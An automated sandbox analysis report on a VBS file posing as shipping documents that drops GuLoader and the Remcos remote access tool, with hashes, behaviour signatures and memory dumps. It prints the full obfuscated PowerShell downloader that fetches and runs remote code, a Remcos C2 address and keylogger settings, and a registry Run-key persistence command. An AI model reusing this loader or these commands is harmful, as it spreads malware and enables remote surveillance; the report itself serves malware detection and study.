Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2024, 13:15

General

  • Target

    awb_shipping_documents_25_03_2024_000000000.vbs

  • Size

    237KB

  • MD5

    937285e67679dcbd6d3a218cff5723e4

  • SHA1

    73023fa293fc84f1db845a75a4be3c2337c8da4d

  • SHA256

    d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb

  • SHA512

    607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773

  • SSDEEP

    6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI

Malware Config

Extracted

Family

remcos

Botnet

Latest

C2

85.209.176.69:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    pavnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    lakosegtst-I6VUY0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
        3⤵
          PID:2672
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
            4⤵
              PID:1204
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2796
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2648

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

              Filesize

              67KB

              MD5

              753df6889fd7410a2e9fe333da83a429

              SHA1

              3c425f16e8267186061dd48ac1c77c122962456e

              SHA256

              b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

              SHA512

              9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              344B

              MD5

              56806503d509b74473ee9cd6de3ee361

              SHA1

              99d3ebf5f6726c1bd224349d858d15cef1d76835

              SHA256

              03c56f28cf9424b093882e6d5bc0edcbcffe15315348046f6e5d4f7ef6bccc2f

              SHA512

              3a618c9e42f0741be6a57a126554cdaaed87eae96ef78accf5f91753a320a96f3ad5b38d327eb539e44274f1a6e57962ab00addfaaac9a7a119404fd903e774f

            • C:\Users\Admin\AppData\Local\Temp\Cab40F8.tmp

              Filesize

              65KB

              MD5

              ac05d27423a85adc1622c714f2cb6184

              SHA1

              b0fe2b1abddb97837ea0195be70ab2ff14d43198

              SHA256

              c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

              SHA512

              6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

            • C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp

              Filesize

              171KB

              MD5

              9c0c641c06238516f27941aa1166d427

              SHA1

              64cd549fb8cf014fcd9312aa7a5b023847b6c977

              SHA256

              4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

              SHA512

              936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

            • C:\Users\Admin\AppData\Local\Temp\Tar467D.tmp

              Filesize

              175KB

              MD5

              dd73cead4b93366cf3465c8cd32e2796

              SHA1

              74546226dfe9ceb8184651e920d1dbfb432b314e

              SHA256

              a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

              SHA512

              ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IP3KYTWLGLS12BKGRK4S.temp

              Filesize

              7KB

              MD5

              e6855b698fbeceacb3b4c96de7246444

              SHA1

              fa81d0a6e58baa9bb4256a36e5594c00d0cb257a

              SHA256

              75d6628cd01af0afc387545948b4fc74f2204bddf969772f57d57effc2b85ae9

              SHA512

              80995c986c267f6ee94a4129c99fbe2e2929ce8786ec5275558ba4db771807da8aaeaebee7eb66ab8bc053652c3132a4e4a6f0e171c836adc4dffc0fe15e8ebe

            • memory/1344-122-0x0000000077190000-0x0000000077266000-memory.dmp

              Filesize

              856KB

            • memory/1344-124-0x0000000001500000-0x00000000034F4000-memory.dmp

              Filesize

              32.0MB

            • memory/1344-121-0x00000000771C6000-0x00000000771C7000-memory.dmp

              Filesize

              4KB

            • memory/1344-123-0x0000000000490000-0x00000000014F2000-memory.dmp

              Filesize

              16.4MB

            • memory/1344-125-0x0000000077190000-0x0000000077266000-memory.dmp

              Filesize

              856KB

            • memory/1344-120-0x0000000076FA0000-0x0000000077149000-memory.dmp

              Filesize

              1.7MB

            • memory/1344-118-0x0000000001500000-0x00000000034F4000-memory.dmp

              Filesize

              32.0MB

            • memory/2404-130-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2404-81-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-80-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2404-79-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-99-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2404-100-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-101-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-102-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-103-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-78-0x00000000024D0000-0x0000000002550000-memory.dmp

              Filesize

              512KB

            • memory/2404-77-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2404-76-0x0000000002460000-0x0000000002468000-memory.dmp

              Filesize

              32KB

            • memory/2404-75-0x000000001B3A0000-0x000000001B682000-memory.dmp

              Filesize

              2.9MB

            • memory/2652-104-0x0000000072FE0000-0x000000007358B000-memory.dmp

              Filesize

              5.7MB

            • memory/2652-111-0x0000000005C40000-0x0000000005C41000-memory.dmp

              Filesize

              4KB

            • memory/2652-112-0x00000000064D0000-0x00000000084C4000-memory.dmp

              Filesize

              32.0MB

            • memory/2652-113-0x00000000064D0000-0x00000000084C4000-memory.dmp

              Filesize

              32.0MB

            • memory/2652-114-0x0000000076FA0000-0x0000000077149000-memory.dmp

              Filesize

              1.7MB

            • memory/2652-115-0x0000000002620000-0x0000000002660000-memory.dmp

              Filesize

              256KB

            • memory/2652-116-0x0000000005E30000-0x0000000005F30000-memory.dmp

              Filesize

              1024KB

            • memory/2652-117-0x0000000077190000-0x0000000077266000-memory.dmp

              Filesize

              856KB

            • memory/2652-108-0x0000000005E30000-0x0000000005F30000-memory.dmp

              Filesize

              1024KB

            • memory/2652-119-0x00000000064D0000-0x00000000084C4000-memory.dmp

              Filesize

              32.0MB

            • memory/2652-107-0x0000000002620000-0x0000000002660000-memory.dmp

              Filesize

              256KB

            • memory/2652-105-0x0000000072FE0000-0x000000007358B000-memory.dmp

              Filesize

              5.7MB

            • memory/2652-106-0x0000000002620000-0x0000000002660000-memory.dmp

              Filesize

              256KB

            • memory/2652-87-0x0000000002620000-0x0000000002660000-memory.dmp

              Filesize

              256KB

            • memory/2652-86-0x0000000002620000-0x0000000002660000-memory.dmp

              Filesize

              256KB

            • memory/2652-85-0x0000000072FE0000-0x000000007358B000-memory.dmp

              Filesize

              5.7MB

            • memory/2652-127-0x0000000072FE0000-0x000000007358B000-memory.dmp

              Filesize

              5.7MB

            • memory/2652-129-0x00000000064D0000-0x00000000084C4000-memory.dmp

              Filesize

              32.0MB

            • memory/2652-84-0x0000000072FE0000-0x000000007358B000-memory.dmp

              Filesize

              5.7MB